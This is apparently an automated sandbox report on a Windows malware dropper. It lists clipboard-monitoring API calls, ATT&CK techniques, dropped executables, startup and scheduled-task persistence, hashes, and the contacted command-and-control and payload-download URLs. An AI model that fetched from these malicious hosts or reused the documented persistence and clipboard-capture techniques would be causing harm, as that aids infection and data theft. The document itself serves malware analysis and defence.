Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_03F59B10 AddClipboardFormatListener,SetEvent,	16_2_03F59B10
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_03F59A0A AddClipboardFormatListener,	16_2_03F59A0A
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_03F597F8 RemoveClipboardFormatListener,	16_2_03F597F8
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_03F59686 IsWindow,RemoveClipboardFormatListener,IsWindow,	16_2_03F59686
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_004098C0 AddClipboardFormatListener,SetEvent,	22_2_004098C0
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_00409436 IsWindow,RemoveClipboardFormatListener,IsWindow,	22_2_00409436
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_004095A8 RemoveClipboardFormatListener,	22_2_004095A8
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_004097BA AddClipboardFormatListener,	22_2_004097BA
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_05A097F8 RemoveClipboardFormatListener,	22_2_05A097F8
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_05A09686 IsWindow,RemoveClipboardFormatListener,IsWindow,	22_2_05A09686
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_05A09B10 AddClipboardFormatListener,SetEvent,	22_2_05A09B10
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_05A09A0A AddClipboardFormatListener,	22_2_05A09A0A
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_004098C0 AddClipboardFormatListener,SetEvent,	25_2_004098C0
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_00409436 IsWindow,RemoveClipboardFormatListener,IsWindow,	25_2_00409436
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_004095A8 RemoveClipboardFormatListener,	25_2_004095A8
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_004097BA AddClipboardFormatListener,	25_2_004097BA
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_059D97F8 RemoveClipboardFormatListener,	25_2_059D97F8
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_059D9686 IsWindow,RemoveClipboardFormatListener,IsWindow,	25_2_059D9686
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_059D9B10 AddClipboardFormatListener,SetEvent,	25_2_059D9B10
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_059D9A0A AddClipboardFormatListener,	25_2_059D9A0A

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Startup Items1	Startup Items1	Deobfuscate/Decode Files or Information1	OS Credential Dumping1	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer22	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job	Registry Run Keys / Startup Folder2	Process Injection12	Obfuscated Files or Information3	Input Capture121	Account Discovery1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Registry Run Keys / Startup Folder2	Software Packing22	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Screen Capture1	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Masquerading1	NTDS	System Information Discovery55	Distributed Component Object Model	Input Capture121	Scheduled Transfer	Application Layer Protocol23	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion31	LSA Secrets	Query Registry1	SSH	Clipboard Data2	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Process Injection12	Cached Domain Credentials	Security Software Discovery131	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Process Discovery11	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Virtualization/Sandbox Evasion31	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	31%	Virustotal		Browse
SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	33%	ReversingLabs	Win32.Dropper.Generic
SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\New Feature\4.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Murano.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\lv[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\lv[1].exe	31%	ReversingLabs	Win32.Dropper.Scrop
C:\Users\user\AppData\Local\Temp\Murano.exe	31%	ReversingLabs	Win32.Dropper.Scrop
C:\Users\user\AppData\Local\Temp\New Feature\4.exe	38%	ReversingLabs	Win32.Dropper.Scrop
C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	15%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\UAC.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\UAC.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	38%	ReversingLabs	Win32.Dropper.Scrop

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
18.1.vpn.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File
0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.4201e90.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
awumad01.top	7%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://aufsvg12.top/index.php	0%	Avira URL Cloud	safe
http://mardeq01.top/index.php	0%	Avira URL Cloud	safe
http://aufsvg12.top/index.php)	0%	Avira URL Cloud	safe
http://awumad01.top/download.php?file=lv.exeopenBOOLEANBIT	0%	Avira URL Cloud	safe
http://www.avast.com0/	0%	Avira URL Cloud	safe
http://awumad01.top/downfiles/lv.exe	0%	Avira URL Cloud	safe
http://awumad01.top/download.php?file=lv.exeqEaRrk	0%	Avira URL Cloud	safe
http://www.avast.com0	0%	Avira URL Cloud	safe
http://aufsvg12.top/index.phpz	0%	Avira URL Cloud	safe
http://awumad01.top/download.php?file=lv.exe	0%	Avira URL Cloud	safe
http://awumad01.top/download.php?file=lv.exeskQ	0%	Avira URL Cloud	safe
http://awumad01.top/downfiles/lv.exeaC:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mardeq01.top	8.209.64.179	true	false		unknown
awumad01.top	8.209.66.205	true	true	7%, Virustotal, Browse	unknown
aufsvg12.top	8.211.1.15	true	false		unknown
EiodCJGkPupHarewIHgoYXhjJQvRZ.EiodCJGkPupHarewIHgoYXhjJQvRZ	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://aufsvg12.top/index.php	false	Avira URL Cloud: safe	unknown
http://mardeq01.top/index.php	false	Avira URL Cloud: safe	unknown
http://awumad01.top/downfiles/lv.exe	true	Avira URL Cloud: safe	unknown
http://awumad01.top/download.php?file=lv.exe	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr	false		high
https://duckduckgo.com/chrome_newtab	SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr	false		high
https://duckduckgo.com/ac/?q=	SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr	false		high
http://aufsvg12.top/index.php)	SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383709949.0000000005C16000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://awumad01.top/download.php?file=lv.exeopenBOOLEANBIT	SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp	true	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr	false		high
http://www.autoitscript.com/autoit3/X	vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr	false		high
http://www.avast.com0/	Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr	false	Avira URL Cloud: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr	false		high
http://nsis.sf.net/NSIS_ErrorError	SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.377165659.0000000005CD9000.00000004.00000001.sdmp, Murano.exe, 0000000D.00000000.381399655.0000000000409000.00000002.00020000.sdmp, Murano.exe.0.dr	false		high
https://www.autoitscript.com/autoit3/	vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr	false		high
http://awumad01.top/download.php?file=lv.exeqEaRrk	SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.377076214.0000000005C65000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://www.avast.com0	Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr	false		high
http://aufsvg12.top/index.phpz	SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383709949.0000000005C16000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://awumad01.top/download.php?file=lv.exeskQ	SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383766722.0000000005C63000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr	false		high
http://awumad01.top/downfiles/lv.exeaC:	SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383709949.0000000005C16000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
8.209.66.205	awumad01.top	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true
8.211.1.15	aufsvg12.top	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	false
8.209.64.179	mardeq01.top	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	385467
Start date:	12.04.2021
Start time:	15:10:19
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.W32.AIDetect.malware1.24453.7436 (renamed file extension from 7436 to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@41/35@5/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 50.4% (good quality ratio 47%) Quality average: 79.4% Quality standard deviation: 29.6%
HCA Information:	Successful, ratio: 68% Number of executed functions: 136 Number of non-executed functions: 166
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe Excluded IPs from analysis (whitelisted): 20.82.209.104, 131.253.33.200, 13.107.22.200, 93.184.220.29, 104.43.139.144, 92.122.145.220, 168.61.161.212, 104.43.193.48, 104.42.151.234, 23.57.80.111, 13.107.5.88, 13.107.42.23, 2.20.142.209, 2.20.142.210, 92.122.213.247, 92.122.213.194, 20.82.210.154, 20.54.26.129 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, cs9.wac.phicdn.net, client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, config-edge-skype.l-0014.l-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, l-0014.config.skype.com, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, afdo-tas-offload.trafficmanager.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, dual-a-0001.dc-msedge.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, l-0014.l-msedge.net, skypedataprdcolwus16.cloudapp.net Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:12:17	API Interceptor	1x Sleep call for process: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe modified
15:12:26	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk
15:12:28	Task Scheduler	Run new task: Smart Clock path: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe

Joe Sandbox View / Context

IPs

No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
mardeq01.top	file.exe	Get hash	malicious	Browse	34.116.248.73
mardeq01.top	C++ Dropper.exe	Get hash	malicious	Browse	34.116.248.73
awumad01.top	file.exe	Get hash	malicious	Browse	35.228.166.216
aufsvg12.top	file.exe	Get hash	malicious	Browse	34.118.72.185
aufsvg12.top	C++ Dropper.exe	Get hash	malicious	Browse	34.118.72.185

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	my_attach_00968.vbs	Get hash	malicious	Browse	8.210.83.250
	tDDFLIR3f6.exe	Get hash	malicious	Browse	8.209.68.164
	document-1429954472.xls	Get hash	malicious	Browse	47.244.191.15
	document-1429954472.xls	Get hash	malicious	Browse	47.244.191.15
	documents-351331057.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-351331057.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-1819557117.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-1819557117.xlsm	Get hash	malicious	Browse	8.211.4.209
	BvuKqSpgIG.exe	Get hash	malicious	Browse	198.11.132.10
	3vQD6TIYA1.exe	Get hash	malicious	Browse	8.209.67.151
	wininit.dll	Get hash	malicious	Browse	8.208.88.90
	XN123gfQJQ.exe	Get hash	malicious	Browse	8.209.67.151
	0408_391585988029.doc	Get hash	malicious	Browse	8.208.88.90
	msals.pumpl.dll	Get hash	malicious	Browse	8.208.88.90
	BrgW593cHH.exe	Get hash	malicious	Browse	8.208.95.18
	BrgW593cHH.exe	Get hash	malicious	Browse	8.208.95.18
	WDnE51mua6.exe	Get hash	malicious	Browse	8.208.95.18
	documents-2112491607.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-1660683173.xlsm	Get hash	malicious	Browse	8.211.4.209
	0406_37400496097832.doc	Get hash	malicious	Browse	8.208.95.92
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	my_attach_00968.vbs	Get hash	malicious	Browse	8.210.83.250
	tDDFLIR3f6.exe	Get hash	malicious	Browse	8.209.68.164
	document-1429954472.xls	Get hash	malicious	Browse	47.244.191.15
	document-1429954472.xls	Get hash	malicious	Browse	47.244.191.15
	documents-351331057.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-351331057.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-1819557117.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-1819557117.xlsm	Get hash	malicious	Browse	8.211.4.209
	BvuKqSpgIG.exe	Get hash	malicious	Browse	198.11.132.10
	3vQD6TIYA1.exe	Get hash	malicious	Browse	8.209.67.151
	wininit.dll	Get hash	malicious	Browse	8.208.88.90
	XN123gfQJQ.exe	Get hash	malicious	Browse	8.209.67.151
	0408_391585988029.doc	Get hash	malicious	Browse	8.208.88.90
	msals.pumpl.dll	Get hash	malicious	Browse	8.208.88.90
	BrgW593cHH.exe	Get hash	malicious	Browse	8.208.95.18
	BrgW593cHH.exe	Get hash	malicious	Browse	8.208.95.18
	WDnE51mua6.exe	Get hash	malicious	Browse	8.208.95.18
	documents-2112491607.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-1660683173.xlsm	Get hash	malicious	Browse	8.211.4.209
	0406_37400496097832.doc	Get hash	malicious	Browse	8.208.95.92
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	my_attach_00968.vbs	Get hash	malicious	Browse	8.210.83.250
	tDDFLIR3f6.exe	Get hash	malicious	Browse	8.209.68.164
	document-1429954472.xls	Get hash	malicious	Browse	47.244.191.15
	document-1429954472.xls	Get hash	malicious	Browse	47.244.191.15
	documents-351331057.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-351331057.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-1819557117.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-1819557117.xlsm	Get hash	malicious	Browse	8.211.4.209
	BvuKqSpgIG.exe	Get hash	malicious	Browse	198.11.132.10
	3vQD6TIYA1.exe	Get hash	malicious	Browse	8.209.67.151
	wininit.dll	Get hash	malicious	Browse	8.208.88.90
	XN123gfQJQ.exe	Get hash	malicious	Browse	8.209.67.151
	0408_391585988029.doc	Get hash	malicious	Browse	8.208.88.90
	msals.pumpl.dll	Get hash	malicious	Browse	8.208.88.90
	BrgW593cHH.exe	Get hash	malicious	Browse	8.208.95.18
	BrgW593cHH.exe	Get hash	malicious	Browse	8.208.95.18
	WDnE51mua6.exe	Get hash	malicious	Browse	8.208.95.18
	documents-2112491607.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-1660683173.xlsm	Get hash	malicious	Browse	8.211.4.209
	0406_37400496097832.doc	Get hash	malicious	Browse	8.208.95.92

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\UAC.dll	SecuriteInfo.com.ArtemisAFF6F8C75217.6228.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	tDDFLIR3f6.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FFIJ.17175.exe	Get hash	malicious	Browse
	3vQD6TIYA1.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Coins.Win32.5986.15363.exe	Get hash	malicious	Browse
	XN123gfQJQ.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.PWS.Siggen2.64388.32153.exe	Get hash	malicious	Browse
	V7UnYc7CCN.exe	Get hash	malicious	Browse
	FileZilla_3.53.1_win64_sponsored-setup.exe	Get hash	malicious	Browse
	FileZilla_3.53.1_win64_sponsored-setup.exe	Get hash	malicious	Browse
	1Nqs1iTfMz.exe	Get hash	malicious	Browse
	lv.exe	Get hash	malicious	Browse
	IaYA2iuuIV.exe	Get hash	malicious	Browse
	Ypp2jYNpAI.exe	Get hash	malicious	Browse
	1k2RZQrqkh.exe	Get hash	malicious	Browse
	JspemsXAtV.exe	Get hash	malicious	Browse
	3688975dcd3f7829cfe55f7dd46166e0d6bd46c842c16.exe	Get hash	malicious	Browse
	hLOTlwUNup.exe	Get hash	malicious	Browse
	vZzN8hoqnD.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\lv[1].exe	file.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	SecuriteInfo.com.ArtemisAFF6F8C75217.6228.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	file.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\New Feature\4.exe	SecuriteInfo.com.ArtemisAFF6F8C75217.6228.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\New Feature\4.exe	file.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\Murano.exe	file.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\lv[1].exe Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	1257147
Entropy (8bit):	7.935226985820231
Encrypted:	false
SSDEEP:	12288:40gbfdhi0JFnqgMTCVAJGstzWentOPwCKIdNyt58e44H4EQXcgZAf7qrBWVt80z/:DC1hVnq3xJN/tLCH28e440p50f83y
MD5:	AFF6F8C7521796D3BC8FC1059DBE2409
SHA1:	EAA8368B259BEB696D45BA1A69B75BC0D99C8BC9
SHA-256:	826D2E8F10F6991F25DAE46522FB53D041A4D740C4AE0A8B570C41C099E9E31F
SHA-512:	CF3DE72146E5E3F2EFAD7AC2982DF23F92FA46297C7F161BAC38D227ECCD35A728A36D90583BDAF81CE5B7427CB108D692D81E2048A6A85115A09A4228F7A64C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 31%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse
IE Cache URL:	http://awumad01.top/downfiles/lv.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8............@.......................................@.................................@................................`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Murano.exe Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1257147
Entropy (8bit):	7.935226985820231
Encrypted:	false
SSDEEP:	12288:40gbfdhi0JFnqgMTCVAJGstzWentOPwCKIdNyt58e44H4EQXcgZAf7qrBWVt80z/:DC1hVnq3xJN/tLCH28e440p50f83y
MD5:	AFF6F8C7521796D3BC8FC1059DBE2409
SHA1:	EAA8368B259BEB696D45BA1A69B75BC0D99C8BC9
SHA-256:	826D2E8F10F6991F25DAE46522FB53D041A4D740C4AE0A8B570C41C099E9E31F
SHA-512:	CF3DE72146E5E3F2EFAD7AC2982DF23F92FA46297C7F161BAC38D227ECCD35A728A36D90583BDAF81CE5B7427CB108D692D81E2048A6A85115A09A4228F7A64C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 31%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8............@.......................................@.................................@................................`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\New Feature\4.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\Murano.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	328704
Entropy (8bit):	6.796040916616973
Encrypted:	false
SSDEEP:	6144:TTxj9L+GunafsHK8zIjIVp20bhPeCPHhNX:TTxJzBsq8kJ07H
MD5:	E99CED09C77FFEC9F09B33642E9B0E99
SHA1:	01217AD74FDCFE07F1EA0FE296AB4D2B809CD581
SHA-256:	02F5996141F5FE2B189D8E2B1556EAB985E55E91D9F476DABC691F7C693B2400
SHA-512:	F4D515C7E920B30E7E12EB6BC77E0446F31286259804BAEFD1B33A338CFF9DB6E688173E59A7110F11298199646F31EEC8934E502F130AF5FC765E02FC543186
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 38%
Joe Sandbox View:	Filename: SecuriteInfo.com.ArtemisAFF6F8C75217.6228.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L.....^_...........................=-............@..........................0....../z..............................Pf..j....[..<....p..0...........................................................hJ..@............ ...............................text...?........................... ..`.data...<..........................@....yiku..............................@....padozocy...........................@....new.....F... ...H..................@..@.rsrc...0....p.......X..............@..@.reloc...............p..............@..B................................................................................................................................................................................................................................

